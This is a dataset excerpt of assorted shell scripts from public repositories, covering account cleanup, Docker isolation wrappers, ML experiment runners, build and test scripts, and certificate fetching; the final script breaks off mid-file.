blob_id stringlengths 40 40 | language stringclasses 1 value | repo_name stringlengths 4 115 | path stringlengths 2 970 | src_encoding stringclasses 28 values | length_bytes int64 31 5.38M | score float64 2.52 5.28 | int_score int64 3 5 | detected_licenses listlengths 0 161 | license_type stringclasses 2 values | text stringlengths 31 5.39M | download_success bool 1 class |
|---|---|---|---|---|---|---|---|---|---|---|---|
b9135c69875a5cca058b86a35b3c763e9be35326 | Shell | adailtonsuporte/vpsmanager2 | /expcleaner2.sh | UTF-8 | 884 | 3.375 | 3 | [] | no_license | #!/bin/bash
datenow=$(date +%s)
tput setaf 7 ; tput setab 4 ; tput bold ; printf '%45s%-10s%-5s\n' "Removedor de contas expiradas" ""
printf '%-20s%-25s%-20s\n' "Usuário" "Data de expiração" "Estado/Ação" ; echo "" ; tput sgr0
for user in $(awk -F: '{print $1}' /etc/passwd); do
expdate=$(chage -l $user|awk -F: '/Account expires/{print $2}')
echo $expdate|grep -q never && continue
datanormal=$(date -d"$expdate" '+%d/%m/%Y')
tput setaf 3 ; tput bold ; printf '%-20s%-21s%s' $user $datanormal ; tput sgr0
expsec=$(date +%s --date="$expdate")
diff=$(echo $datenow - $expsec|bc -l)
tput setaf 2 ; tput bold
echo $diff|grep -q ^\- && echo "Ativo (Não removido)" && continue
tput setaf 1 ; tput bold
echo "Expirado (Removido)"
pkill -f $user
userdel $user
grep -v ^$user[[:space:]] /root/usuarios.db > /tmp/ph ; cat /tmp/ph > /root/usuarios.db
done
tput sgr0
echo ""
| true |
f12676457fb72a8fb0f5f97d2fd3d4c805e8d5a3 | Shell | dadelani/afriberta | /run_all.sh | UTF-8 | 2,237 | 3.15625 | 3 | [
"MIT"
] | permissive | #!/bin/bash
export CUDA_AVAILABLE_DEVICES=0,1
# Train Masked Language Model
experiment_name=afriberta_small
python main.py --experiment_name $experiment_name --config_path=mlm_configs/afriberta_small.yml
# Evaluate on Named Entity Recognition
ner_model_path="${experiment_name}_ner_model"
tokenizer_path=afriberta_tokenizer_70k # specify tokenizer path
mkdir $PWD/$ner_model_path
cp $PWD/experiments/$experiment_name/pytorch_model.bin $PWD/$ner_model_path/pytorch_model.bin
cp $PWD/experiments/$experiment_name/config.json $PWD/$ner_model_path/config.json
MAX_LENGTH=164
MODEL_PATH=$ner_model_path
BATCH_SIZE=16
NUM_EPOCHS=50
SAVE_STEPS=1000
TOK_PATH=$tokenizer_path
declare -a arr=("amh" "hau" "ibo" "kin" "lug" "luo" "pcm" "swa" "wol" "yor")
for SEED in 1 2 3 4 5
do
output_dir=ner_results/"${experiment_name}_ner_results_${SEED}"
mkdir $PWD/$output_dir
for i in "${arr[@]}"
do
OUTPUT_DIR=$PWD/$output_dir/"$i"
DATA_DIR=ner_data/"$i"
python ner_scripts/train_ner.py --data_dir $DATA_DIR \
--model_type nil \
--model_name_or_path $MODEL_PATH \
--tokenizer_path $TOK_PATH \
--output_dir $OUTPUT_DIR \
--max_seq_length $MAX_LENGTH \
--num_train_epochs $NUM_EPOCHS \
--per_gpu_train_batch_size $BATCH_SIZE \
--per_gpu_eval_batch_size $BATCH_SIZE \
--save_steps $SAVE_STEPS \
--seed $SEED \
--do_train \
--do_eval \
--do_predict
done
done
# Evaluate on Text Classification
export PYTHONPATH=$PWD
for SEED in 1 2 3 4 5
do
output_dir=classification_results/"${MODEL_PATH}_hausa_${SEED}"
python classification_scripts/classification_trainer.py --data_dir hausa_classification_data \
--model_dir $MODEL_PATH \
--tok_dir $TOK_PATH \
--output_dir $output_dir \
--language hausa \
--seed $SEED \
--max_seq_length 500
output_dir=classification_results/"${MODEL_PATH}_yoruba_${SEED}"
python classification_scripts/classification_trainer.py --data_dir yoruba_classification_data \
--model_dir $MODEL_PATH \
--tok_dir $TOK_PATH \
--output_dir $output_dir \
--language yoruba \
--seed $SEED \
--max_seq_length 500
done
| true |
763b9d5289e25650cc6432a86d5ead0aa30153e0 | Shell | ismo-karkkainen/datalackey | /test/memory/abs-change-directory.sh | UTF-8 | 787 | 3.46875 | 3 | [
"LicenseRef-scancode-unknown-license-reference",
"UPL-1.0"
] | permissive | #!/bin/sh
if [ $# -ne 1 ]; then
echo "Usage: $(basename $0) datalackey-executable"
exit 100
fi
B=$(basename $0 .sh)
DL=$1
OUT="${B}_out.txt"
EXP="${B}_expected.txt"
cat > _script.sh << EOF
#!/bin/sh
touch cwd
EOF
chmod a+x _script.sh
SUBDIR=$(pwd)/subdir
rm -rf "$SUBDIR"
mkdir "$SUBDIR"
(
echo '["1","run","out","JSON","stdout","change-directory",'
echo "\"$SUBDIR\""
echo ',"program","./_script.sh"]'
) | $DL -m -i stdin JSON -o stdout JSON |
replace-pid > $OUT
cat > $EXP <<EOF
["1","run","running","pid"]
[null,"process","started","1","pid"]
set
["1","run","input","closed"]
["1","run","exit",0]
end
[null,"process","ended","1","pid"]
["1","run","finished"]
["1","done",""]
EOF
test -f "$SUBDIR/cwd" &&
compare-output $OUT $EXP && rm -rf $OUT $EXP _script.sh "$SUBDIR"
| true |
62075ac496cabf1a7a5c347d51efae60b17b13d6 | Shell | google/skia-buildbot | /bugs-central/bin/create-github-token-secret.sh | UTF-8 | 402 | 3.3125 | 3 | [
"BSD-3-Clause"
] | permissive | #/bin/bash
# Creates the bugs-central-github-token secret.
set -e -x
if [ "$#" -ne 1 ]; then
echo "The argument must be the github token."
echo ""
echo "./create-github-token-secret.sh xyz"
exit 1
fi
SECRET_VALUE=$1
SECRET_NAME="bugs-central-github-token"
echo ${SECRET_VALUE} >> github_token
../../kube/secrets/add-secret-from-directory.sh \
github_token \
skia-public \
${SECRET_NAME}
| true |
da54700f948c33b8246de82ecdd905689fc417d8 | Shell | yukisako/GeneticAlgorithm | /simu.sh | UTF-8 | 155 | 2.671875 | 3 | [] | no_license | #!/bin/sh
currentGeneration=915
for i in `seq 0 3000`
do
./a.out ${currentGeneration} -notex
currentGeneration=`expr ${currentGeneration} + 1`
done
| true |
587622d3f36671b9da974ab214b46ae4e94fbc8b | Shell | leonardt/magma_coreir_chisel_firrtl | /lfsr-chisel/run.sh | UTF-8 | 634 | 3.125 | 3 | [] | no_license | #!/bin/bash
set -e
TEST="lfsr"
GREEN='\033[0;32m'
NC='\033[0m' # No Color
mkdir -p build
echo -e "Running firrtl-interpreter test on $TEST.fir with $TEST.vec"
cd ../firrtl-interpreter
./run-test-vec.sh -f ../lfsr-chisel/$TEST.fir -tv ../lfsr-chisel/$TEST.vec -so
cd ../$TEST-chisel
echo -e "${GREEN}PASSED (firrtl + firrtl-interpreter)${NC}"
echo -e "Running firrtl to generate coreir .json from $TEST.fir"
../firrtl/utils/bin/firrtl -i $TEST.fir -o build/$TEST.json -X coreir
echo -e "Running verilator test"
../coreir-test -i build/$TEST.json -t $TEST.vec
echo -e "${GREEN}PASSED (firrtl->coreir->verilog + verilator)${NC}"
| true |
cf25dc43fc7c114577b69d94ec943042ba2b4e33 | Shell | juliendelile/PhD_manuscript | /docs/js/config_generate | UTF-8 | 3,414 | 3.765625 | 4 | [] | no_license | #!/bin/bash
#Part 1: generate the config.js file that contains associative arrays linking page IDs to their path, depth and title
echo "//generated by config_generate. Do no modify..." > config.js
echo "var filepath = new Array();" >> config.js
echo "var relativepathcorrection = new Array();" >> config.js
echo "var pagetitle = new Array();" >> config.js
echo "var idpage = new Array();" >> config.js
numpage=1;
#main index.html is manually filled. idpage -> 0
echo "filepath[0] = \"index.html\";" >> config.js
echo "relativepathcorrection[0] = \"\";" >> config.js
echo "pagetitle[0] = \"\";" >> config.js
echo "idpage[0] = 0;" >> config.js
fillConfig(){
#extract IDpage
#extract the line that contains Idpage
idpage=`awk '/var IDpage = /,/;/' $1`
#echo "$idpage"
#remove part of the line before IDpage
idpage=${idpage#*IDpage = }
#echo "$idpage"
#remove part of the line after IDpage
idpage=${idpage%;*}
#echo "$idpage"
#extract page title
#extract the line that contains the title
title=`awk '/var titlepage = /,/;/' $1`
#echo "$title"
#remove part of the line before titlepage
title=${title#*titlepage = \"}
#echo "$title"
#remove part of the line after titlepage
title=${title%\";*}
echo "$idpage $title"
#extract file path like page/folder1/folder2
#remove ../
filepath=${1#*/}
#remove /index.html
filepath=${filepath%index*}
#build relative path from depth
relative="../"
for (( i=0; i<$2; i++ )){
relative=$relative"../"
}
echo "filepath[$idpage] = \"$filepath\";" >> config.js
echo "relativepathcorrection[$idpage] = \"$relative\";" >> config.js
echo "pagetitle[$idpage] = \"$title\";" >> config.js
#echo "file $1 idpage:$idpage title:$title filepath:$filepath relative:$relative"
bfilepath[$idpage]=$filepath
brelativepathcorrection[$idpage]=$relative
bpagetitle[$idpage]=$title
echo "idpage[$numpage] = $idpage;" >> config.js
let "numpage += 1"
}
recurse() {
local level=0
let "level = $2 + 1"
#echo "folder $1 depth $level"
for i in "$1"/*;do
if [ -d "$i" ];then
recurse "$i" $level
elif [ -f "$i" ]; then #we could check here if the file name is index.html (later if needed)
fillConfig "$i" $level
fi
done
}
#Get each page information and write config.js
#walk all folder in /page/
for i in "../page"/*;do
if [ -d "$i" ];then
recurse "$i" 0
fi
done
echo "var numpage = $numpage;" >> config.js
#Part 2: write the menu in each index.html
#the href are simply given by the id and another function will convert them later...
menuHTML="<li><a href='home'>Home</a></li><li><a href='manuscript'>Manuscript</a></li>"
recurseMenu() {
#extract IDpage
idpage=`awk '/var IDpage = /,/;/' $1/index.html`
idpage=${idpage#*IDpage = }
idpage=${idpage%;*}
menuHTML="$menuHTML<li><a href='$idpage'>${bpagetitle[$idpage]}</a>"
local subdircount=`find $1 -maxdepth 1 -type d | wc -l`
#if the directory contains subdirectory/ies, prepare ul list
if [ $subdircount -gt 1 ];then
menuHTML="$menuHTML<ul>"
fi
for i in "$1"/*;do
if [ -d "$i" ];then
recurseMenu "$i"
fi
done
if [ $subdircount -gt 1 ];then
menuHTML="$menuHTML</ul>"
fi
menuHTML="$menuHTML</li>"
}
#walk all folder in /page/
for i in "../page"/*;do
if [ -d "$i" ];then
recurseMenu "$i"
fi
done
echo "var menuHTML = \"$menuHTML\";" >> config.js
| true |
ce7e5f4e1ea5cf88d2b27663bf7a8f8f7f9147b5 | Shell | tomgillooly/geogan | /test_circle.sh | UTF-8 | 1,007 | 2.53125 | 3 | [
"BSD-3-Clause",
"BSD-2-Clause"
] | permissive | #!/bin/bash
if [ "$HOSTNAME" == "tomoplata-OptiPlex-790" ]; then
VIRTUALENV_NAME=pytorch3
DATAROOT=~/data/circle_data_non_filled
HOME=~
OPTIONS="--gpu_ids -1 --display_id 0"
else
VIRTUALENV_NAME=cyclegan3
DATAROOT=/storage/Datasets/Geology-NicolasColtice/ellipses
HOME=/home/tgillooly/
OPTIONS="--gpu_ids -1"
fi
if [ "$HOSTNAME" == "marky" ]; then
VIRTUALENV_NAME=pytorch3_cuda8
fi
source $HOME/$VIRTUALENV_NAME/bin/activate
# python -m visdom.server > visdom.log 2>&1 &
# python test.py --dataroot /storage/Datasets/Geology-NicolasColtice/DS2-1810-RAW-DAT --name geo_pix2pix_skel_remove --model pix2pix --which_model_netG unet_256 --which_direction BtoA --dataset_mode geo --norm batch --process skeleton_remove_small_components
python test.py --dataroot $DATAROOT --name $1 --model div_inline --which_model_netG unet_256 \
--which_epoch $2 --how_many 10 --serial_batches \
--which_direction BtoA --dataset_mode geo --norm batch --input_nc 3 --output_nc 1 $OPTIONS
# kill %1
deactivate
| true |
44c125834ac8e517acda4558a69ceef5cc113397 | Shell | hugojosefson/isolate-in-docker | /isolate-in-docker | UTF-8 | 12,436 | 4.40625 | 4 | [] | no_license | #!/usr/bin/env bash
## This file is not meant to be executed directly.
## It should be executed via a symlink, named the same as the executable you wish to execute inside the Docker image.
## Documentation at https://github.com/hugojosefson/isolate-in-docker#readme
# Fail on any error
set -e
# Save args
args=("$@")
# Numeric booleans, for legibility
true=0
false=1
# Default, if none specified in ./.nvmrc nor in $NODE_VERSION
DEFAULT_NODE_VERSION=latest
# Print docker arguments for allowing the container to access the host's docker engine, in case $DOCKERCEPTION is set.
maybeDockerception() {
[[ -z "${DOCKERCEPTION}" ]] && return
local docker_sock
local docker_sock_gid
local docker_bin
docker_sock="$(docker context inspect -f '{{.Endpoints.docker.Host}}' | sed -E 's/^unix:\/\///')"
docker_sock_gid="$(stat -c '%g' "${docker_sock}")"
docker_bin="$(command -v docker)"
echo "--group-add \"${docker_sock_gid}\" \
-v \"${docker_sock}\":\"${docker_sock}\" \
-v \"${docker_bin}\":\"${docker_bin}\":ro \
"
}
# Does the file exist and is readable to us, or is a symlink to such a file?
fileExists() {
local target="${1}"
if [[ ! -r "${target}" ]]; then
return ${false}
elif [[ -f "${target}" ]]; then
return ${true}
elif [[ -L "${target}" ]]; then
fileExists "$(readlink -f "${target}")"
else
return ${false}
fi
}
sourceFileIfExists() {
if fileExists "${1}"; then
echo Sourcing "${1}" >&2
. "${1}"
fi
}
getLinkName() {
basename "${0}"
}
getDockerWorkdir() {
local possiblyRelativeWorkdir="${DOCKER_WORKDIR:-$(pwd)}"
(cd "${possiblyRelativeWorkdir}" && pwd)
}
rand() {
# shellcheck disable=SC2002
cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w "${1:-32}" | head -n 1
}
safeName() {
cat \
| sed -E 's/\n//g' \
| sed -E 's/^\/$/root/' \
| sed -E 's/^\/-/root-/' \
| sed -E 's/^[^a-zA-Z0-9]+//' \
| sed -E "s/[^a-zA-Z0-9_.-]/_/g"
}
# Find the next occurance of an executable with the name $(getLinkName) in the PATH, that does not point to the current script, and execute it.
# If the caller supplies one argument, that will be the program to execute instead of looking for the next executable in the PATH.
override() {
if [[ -n "${1}" ]]; then
exec "${1}" "${args[@]}"
fi
local paths
local current_script
local possible_override
# split PATH into paths using read
IFS=: read -ra paths <<< "${PATH}"
current_script="$(readlink -f "${0}")"
for path in "${paths[@]}"; do
possible_override="${path}/$(getLinkName)"
if [[ "$(readlink -f "${possible_override}")" != "${current_script}" ]]; then
if [[ -x "${possible_override}" ]]; then
echo Overriding implementation with "${possible_override}" >&2
exec "${possible_override}" "${args[@]}"
fi
fi
done
echo No override found on PATH for "$(getLinkName)" >&2
return 1
}
getConfigDirReadme() {
echo "-------------------------------------------------------------------------------
Config dir for isolate-in-docker tools
when in: $(pwd)
-------------------------------------------------------------------------------
NOTE! This config directory is specific for $(pwd)
and used only when your current working directory is that directory!
You may create a file here for each tool you use (named as the symlink, with the
extension .rc, for example \"$(getLinkName).rc\"). If you do, it will be sourced
before running that tool.
You may declare environment variables in the configuration file. For details, see:
https://github.com/hugojosefson/isolate-in-docker#configuration-options
Additionally, if you create a file named \"default.rc\", it will be sourced
before all isolate-in-docker tools, before the specific tool's config file.
-------------------------------------------------------------------------------
If, for this project, you want to override and use the next implementation of
a command on the PATH, instead of via isolate-in-docker, you can create the
relevant .rc file in the config directory, and put this line in it:
override
For example, if you want to override $(getLinkName) with the next available
implementation on the PATH, you can create the file like this:
mkdir -p .isolate-in-docker/config
echo override > .isolate-in-docker/config/$(getLinkName).rc
If you do it without any arguments, it will override the command with the next
implementation on the PATH. If you want to override it with a different
implementation, you can specify the path to the new implementation as an
argument. For example:
override /snap/bin/$(getLinkName)
"
}
readConfigFiles() {
local configDir=".isolate-in-docker/config"
mkdir -p "${configDir}"
getConfigDirReadme > "${configDir}/README"
sourceFileIfExists "${configDir}/default.rc"
sourceFileIfExists "${configDir}/$(getLinkName).rc"
}
getDockerUser() {
echo "${DOCKER_USER:-"$(id -u)":"$(id -g)"}"
}
getNodeVersion() {
if [[ -n "${NODE_VERSION}" ]]; then
echo "${NODE_VERSION}"
return
fi
local nvmrc_version="$(cat .nvmrc 2>/dev/null)"
if [[ -n "${nvmrc_version}" ]]; then
echo "${nvmrc_version}"
return
fi
echo "${DEFAULT_NODE_VERSION}"
}
getDockerCmd() {
if [[ -n "${DOCKER_CMD}" ]]; then
echo "${DOCKER_CMD}"
elif [[ "$(getLinkName)" =~ ^(firefox40)$ ]]; then
echo "/opt/firefox/firefox-bin --new-instance"
elif [[ "$(getLinkName)" =~ ^(signal-desktop)$ ]]; then
echo "signal-desktop --no-sandbox"
else
getLinkName
fi
}
getDockerImage() {
if [[ -n "${DOCKER_IMAGE}" ]]; then
echo "${DOCKER_IMAGE}"
elif [[ "$(getLinkName)" =~ ^(node|npm|npx|yarn)$ ]]; then
echo "--env NODE_ENV=${NODE_ENV} node:$(getNodeVersion)"
elif [[ "$(getLinkName)" =~ ^(firefox40)$ ]]; then
echo "\
--device /dev/dri:/dev/dri \
docker.io/netcapsule/firefox \
"
elif [[ "$(getLinkName)" =~ ^(webstorm|webstorm-install-rust|clion)$ ]]; then
echo "\
--device /dev/dri:/dev/dri \
--user root:root \
--env USER_ID=${USER_ID:-$(id -u)} \
--env USER_NAME=${USER_NAME:-$(id -un)} \
--env GROUP_ID=${GROUP_ID:-$(id -g)} \
--env GROUP_NAME=${GROUP_NAME:-$(id -gn)} \
docker.io/hugojosefson/webstorm \
"
elif [[ "$(getLinkName)" =~ ^(goland|jetbrains-toolbox)$ ]]; then
echo "\
--device /dev/dri:/dev/dri \
--user root:root \
--env USER_ID=${USER_ID:-$(id -u)} \
--env USER_NAME=${USER_NAME:-$(id -un)} \
--env GROUP_ID=${GROUP_ID:-$(id -g)} \
--env GROUP_NAME=${GROUP_NAME:-$(id -gn)} \
docker.io/hugojosefson/goland \
"
elif [[ "$(getLinkName)" =~ ^(pulseUi)$ ]]; then
echo "\
--cap-add NET_ADMIN \
--cap-add SYS_ADMIN \
--cap-add MKNOD \
--device /dev/net/tun:/dev/net/tun \
--device /dev/dri:/dev/dri \
--user root:root \
--env USER_ID=${USER_ID:-$(id -u)} \
--env USER_NAME=${USER_NAME:-$(id -un)} \
--env GROUP_ID=${GROUP_ID:-$(id -g)} \
--env GROUP_NAME=${GROUP_NAME:-$(id -gn)} \
docker.io/hugojosefson/pulsevpn \
"
elif [[ "$(getLinkName)" =~ ^(git-revise)$ ]]; then
echo "-v \"${HOME}/.gitconfig\":\"${HOME}/.gitconfig\":ro docker.io/hugojosefson/git-revise"
elif [[ "$(getLinkName)" =~ ^(signal-desktop)$ ]]; then
echo "\
--device /dev/dri:/dev/dri \
--user root:root \
--env USER_ID=${USER_ID:-$(id -u)} \
--env USER_NAME=${USER_NAME:-$(id -un)} \
--env GROUP_ID=${GROUP_ID:-$(id -g)} \
--env GROUP_NAME=${GROUP_NAME:-$(id -gn)} \
docker.io/hugojosefson/signal-desktop \
"
elif [[ "$(getLinkName)" =~ ^(aws)$ ]]; then
echo "docker.io/mikesir87/aws-cli"
elif [[ "$(getLinkName)" =~ ^(heroku)$ ]]; then
echo "docker.io/dickeyxxx/heroku-cli"
elif [[ "$(getLinkName)" =~ ^(mvn|jaotc|jar|jarsigner|java|javac|javadoc|javap|jcmd|jconsole|jdb|jdeprscan|jdeps|jhsdb|jimage|jinfo|jjs|jlink|jmap|jmod|jps|jrunscript|jshell|jstack|jstat|jstatd|keytool|pack200|rmic|rmid|rmiregistry|serialver|unpack200)$ ]]; then
echo "\
--device /dev/urandom:/dev/urandom \
docker.io/maven \
"
elif [[ "$(getLinkName)" =~ ^(cargo|cargo-clippy|cargo-fmt|cargo-miri|clippy-driver|rls|rust-gdb|rust-lldb|rustc|rustdoc|rustfmt|rustup)$ ]]; then
echo "docker.io/rust"
else
echo "Unknown symlink name: \'$(getLinkName)\'" >&2
exit 1
fi
}
# Are we in a TTY?
isTTY() {
if [[ -t 0 ]]; then
return ${true}
else
return ${false}
fi
}
# Are they running husky?
isHusky() {
if [[ "$*" =~ node_modules/husky/run.js ]]; then
return ${true}
else
return ${false}
fi
}
# Do we have git installed?
haveGit() {
command -v git >/dev/null
}
# Is the current directory a git repo?
isGitRepo() {
[[ -d ".git" ]]
}
# Write current git user config to .isolate-in-docker/home/.gitconfig, so it is visible inside the Docker container.
writeGitUserToConfig() {
local gitEmail
local gitName
local gitConfigFile
gitEmail="$(git config user.email)"
gitName="$(git config user.name)"
gitConfigFile=".isolate-in-docker/home/.gitconfig"
mkdir -p "$(dirname "${gitConfigFile}")"
touch "${gitConfigFile}"
git config --file "${gitConfigFile}" --unset-all user.email || true
git config --file "${gitConfigFile}" --unset-all user.name || true
git config --file "${gitConfigFile}" --add user.email "${gitEmail}"
git config --file "${gitConfigFile}" --add user.name "${gitName}"
}
ensureInFile() {
local file="${1}"
local line="${2}"
if ! grep -x "${line}" "${file}" >/dev/null; then
echo >> "${file}"
echo "${line}" >> "${file}"
fi
}
exists() {
local target="${1}"
ls -d "${target}" >/dev/null 2>&1
}
# Migrates any symlinked directories from previous versions of isolate-in-docker
migrateIfSymlink() {
local name="${1}"
if [[ -L "${name}" ]]; then
local targetDir="$(readlink -f "${name}")"
if [[ -d "${targetDir}" ]]; then
rm -f "${name}"
mv "${targetDir}" "${name}"
else
mv "${name}" "${name}.old"
fi
elif exists "${name}" && ! [[ -d "${name}" ]]; then
mv "${name}" "${name}.old"
fi
}
# Creates a directory .isolate-in-docker, with home and config.
createIsolation() {
if isGitRepo; then
ensureInFile .git/info/exclude .isolate-in-docker/
fi
migrateIfSymlink .isolate-in-docker/home
migrateIfSymlink .isolate-in-docker/config
mkdir -p .isolate-in-docker/empty
mkdir -p .isolate-in-docker/home
mkdir -p .isolate-in-docker/config
if isGitRepo && haveGit; then
writeGitUserToConfig
fi
}
# Check how we were called
if [[ "$(basename "${0}")" == "$(basename "$(readlink -f "${0}")")" ]]; then
echo "This script is meant to be executed via a symlink. \
Please see https://github.com/hugojosefson/isolate-in-docker#readme for installation instructions." >&2
exit 1
fi
# Program starts here
createIsolation
# Configurable env variables
readConfigFiles
DOCKER_IMAGE="$(getDockerImage)"
DOCKER_USER="$(getDockerUser)"
DOCKER_WORKDIR="$(getDockerWorkdir)"
DOCKER_CMD="$(getDockerCmd)"
DOCKER_EXTRA_ARGS="${DOCKER_EXTRA_ARGS:-}"
DOCKER_HOSTNAME="${DOCKER_HOSTNAME:-${DOCKER_NAME:-$(basename "${DOCKER_WORKDIR}" | safeName)}}"
DOCKER_NAME="${DOCKER_NAME:-$(echo "$(basename "${DOCKER_WORKDIR}")"-"$(date --utc --iso-8601=seconds | sed -E 's/://g' | sed -E 's/\+0000/Z/g')"-"$(rand 4)" | safeName)}"
DOCKER_NET="${DOCKER_NET:-host}"
if isTTY && ! isHusky "$@"; then
TTY_ARG="--tty"
else
TTY_ARG=""
fi
if [[ -n "${PORT}" ]]; then
PORT_ARGS="--env PORT=\"${PORT}\""
else
PORT_ARGS=""
fi
if [[ "${DOCKER_WORKDIR}" == "/" ]]; then
DOCKER_WORKDIR_ARGS="--workdir /host-root --volume /:/host-root"
else
mkdir -p ".isolate-in-docker/home${DOCKER_WORKDIR#"${HOME}"}"
DOCKER_WORKDIR_ARGS="--workdir ${DOCKER_WORKDIR} --volume ${DOCKER_WORKDIR}:${DOCKER_WORKDIR}"
fi
exec docker run \
--rm \
--interactive \
--init \
-a stdin -a stdout -a stderr \
${TTY_ARG} \
--name "${DOCKER_NAME}" \
--hostname "${DOCKER_HOSTNAME}" \
--user "${DOCKER_USER}" \
${DOCKER_WORKDIR_ARGS} \
--volume "$(pwd)/.isolate-in-docker/empty:$(pwd)/.isolate-in-docker:ro" \
--volume "$(pwd)/.isolate-in-docker/home:${HOME}" \
--env HOME="${HOME}" \
--volume /tmp/.X11-unix:/tmp/.X11-unix \
--env DISPLAY="${DISPLAY}" \
${PORT_ARGS} \
$(maybeDockerception) \
--net="${DOCKER_NET}" \
${DOCKER_EXTRA_ARGS} \
${DOCKER_IMAGE} \
${DOCKER_CMD} "${args[@]}"
| true |
55254e91e936771dbc11d28f7b76c4c09865121d | Shell | midiacom/alfa | /virtual-nodes/build_all.sh | UTF-8 | 2,813 | 2.890625 | 3 | [
"MIT"
] | permissive | #!/bin/bash
cecho(){
RED="\033[0;31m"
GREEN="\033[0;32m"
YELLOW="\033[1;33m"
# ... ADD MORE COLORS
NC="\033[0m" # No Color
printf "${!1}${2} ${NC}\n"
}
# The Device Types
cecho "GREEN"
cecho "GREEN" ----------------------
cecho "GREEN" "Build Virtual Device Audio Sample"
cecho "GREEN" ----------------------
cecho "GREEN"
cd device/audio_sample/
docker build . -t alfa/device/audio_sample
cecho "GREEN"
cecho "GREEN" ----------------------
cecho "GREEN" "Build Virtual Device Câmera USB"
cecho "GREEN" ----------------------
cecho "GREEN"
cd ../../device/camera_usb/
docker build . -t alfa/device/camera_usb
cecho "GREEN"
cecho "GREEN" ----------------------
cecho "GREEN" "Build Virtual Device RTSP to UDP"
cecho "GREEN" ----------------------
cecho "GREEN"
cd ../../device/rtsp_to_udp/
docker build . -t alfa/device/rtsp_to_udp
cecho "GREEN"
cecho "GREEN" ----------------------
cecho "GREEN" "Build Virtual Device Video Sample"
cecho "GREEN" ----------------------
cecho "GREEN"
cd ../../device/video_sample/
docker build . -t alfa/device/video_sample
cecho "GREEN"
cecho "GREEN" ----------------------
cecho "GREEN" "Build Virtual Device Video Sample"
cecho "GREEN" ----------------------
cecho "GREEN"
cd ../../device/mic_device/
docker build . -t alfa/device/mic_device
# The VMS Types
cecho "GREEN"
cecho "GREEN" ----------------------
cecho "GREEN" "Build Plugin UDP to UDP"
cecho "GREEN" ----------------------
cecho "GREEN"
cd ../../vms/udp_to_udp/
docker build . -t alfa/vms/udp_to_udp
cecho "GREEN"
cecho "GREEN" ----------------------
cecho "GREEN" "Build VMS UDP Video to Black And White and UDP Video"
cecho "GREEN" ----------------------
cecho "GREEN"
cd ../../vms/udp_video_black_white/
docker build . -t alfa/vms/udp_video_black_white
cecho "GREEN"
cecho "GREEN" ----------------------
cecho "GREEN" "Build VMS UDP Video to Crop Video And UDP Video"
cecho "GREEN" ----------------------
cecho "GREEN"
cd ../../vms/udp_video_crop
docker build . -t alfa/vms/udp_video_crop
cecho "GREEN"
cecho "GREEN" ----------------------
cecho "GREEN" "Build VMS Noise Detector"
cecho "GREEN" ----------------------
cecho "GREEN"
cd ../../vms/noise_detector
docker build . -t alfa/vms/noise_detector
cecho "GREEN"
cecho "GREEN" ----------------------
cecho "GREEN" "Build VMS Video Merge"
cecho "GREEN" ----------------------
cecho "GREEN"
cd ../../vms/video_merge
docker build . -t alfa/vms/video_merge
cecho "GREEN"
cecho "GREEN" ----------------------
cecho "GREEN" "Build VMS Face Counter"
cecho "GREEN" ----------------------
cecho "GREEN"
cd ../../vms/face_counter
docker build . -t alfa/vms/face_counter
cecho "GREEN" "-----------------------------"
cecho "GREEN" "The installation was completed"
cecho "GREEN" "-----------------------------"
| true |
8172b45d85693f1f77691929cd40724e449400b0 | Shell | lttr/dotfiles | /not-used/i3/blocks/vpn | UTF-8 | 216 | 2.65625 | 3 | [] | no_license | #!/usr/bin/env bash
VPN1=$(nmcli c | awk '$3=="vpn" && $4!="--" {printf $1}')
[ -n "$VPN1" ] && echo -n "$VPN1 "
VPNC=$(ps aux | grep vpnc | grep -v grep | awk '{printf $NF}')
[ -n "$VPNC" ] && echo -n "$VPNC "
| true |
71039b6759f88a275b5b9ad90831d998b63d6ce8 | Shell | adagios/dotfiles | /bin/download-importer | UTF-8 | 337 | 3.125 | 3 | [
"MIT"
] | permissive | #!/bin/bash
SERVER=$1
IMPORTER=${PWD##*/}
ORIGIN="$SERVER:/opt/recordm-importer/$IMPORTER/"
echo "Downloading from $ORIGIN"
for glob in '*.groovy' '*.js' '*.sql' '*.properties'; do
# queremos globbing
# shellcheck disable=SC2086
scp -o 'ControlPersist 10s' "${ORIGIN}"$glob . 2> >(grep -v 'No such file or directory')
done
| true |
a740ff2cdeb68723e4914e12052f89bb93b28b0d | Shell | olcf/anchor | /src/lib/lib_acme.sh | UTF-8 | 967 | 4.03125 | 4 | [
"MIT"
] | permissive | #!/bin/sh
#
# Run lego to get an HTTP certificate from an ACME server
#
# Reads in the following from the passed environment
# * $acme_server: ACME Server to poll for a certificate
# * $acme_email: Email address to use for ACME account
# Uses the file /ca.pem as the ACME server's issuing and TLS CA
#
# Outputs client certificate and private key to /client.cert and /client.key
# respectively
. /lib/lib_rngd.sh
acme_get_certificate() {
HOSTNAME="$(cat /proc/sys/kernel/hostname)"
rngd_start
info "Getting certificate for ${HOSTNAME} from ${acme_server}"
LEGO_CA_CERTIFICATES=/ca.pem lego --email "${acme_email}" \
--accept-tos \
--server "https://${acme_server}" --path /lego \
--http --domains "${HOSTNAME}" run
rngd_kill
# Move certs to / and remove /lego
info "Certificate issued. Installing"
mv "/lego/certificates/${HOSTNAME}.crt" /client.cert
mv "/lego/certificates/${HOSTNAME}.key" /client.key
rm -rf /lego
}
| true |
59b918047173ab77e2c35cdbe91bfcc52b5bd6db | Shell | orlandothoeny/magento2-vagrant-for-developers | /scripts/guest/configure_cache_backend | UTF-8 | 1,545 | 3.109375 | 3 | [
"MIT"
] | permissive | #!/usr/bin/env bash
vagrant_dir="/vagrant"
source "${vagrant_dir}/scripts/output_functions.sh"
status "Configuring cache backend according to config.yaml"
incrementNestingLevel
cache_backend="$(bash "${vagrant_dir}/scripts/get_config_value.sh" "environment_cache_backend")"
magento_composer_content="$(cat "${MAGENTO_ROOT}/composer.json")"
redis_configuration="
'cache' => [
'frontend' => [
'default' => [
'backend' => 'Cm_Cache_Backend_Redis',
'backend_options' => [
'server' => '127.0.0.1',
'port' => '6379'
],
],
'page_cache' => [
'backend' => 'Cm_Cache_Backend_Redis',
'backend_options' => [
'server' => '127.0.0.1',
'port' => '6379',
'database' => '1',
'compress_data' => '0'
]
]
]
],
"
# Removing existing configuration
perl -i -p0e "s/,\s*'cache'.*\],/,/smg" "${MAGENTO_ROOT}/app/etc/env.php"
incompatible_magento_version_pattern='"version": "2.0.[0-5]'
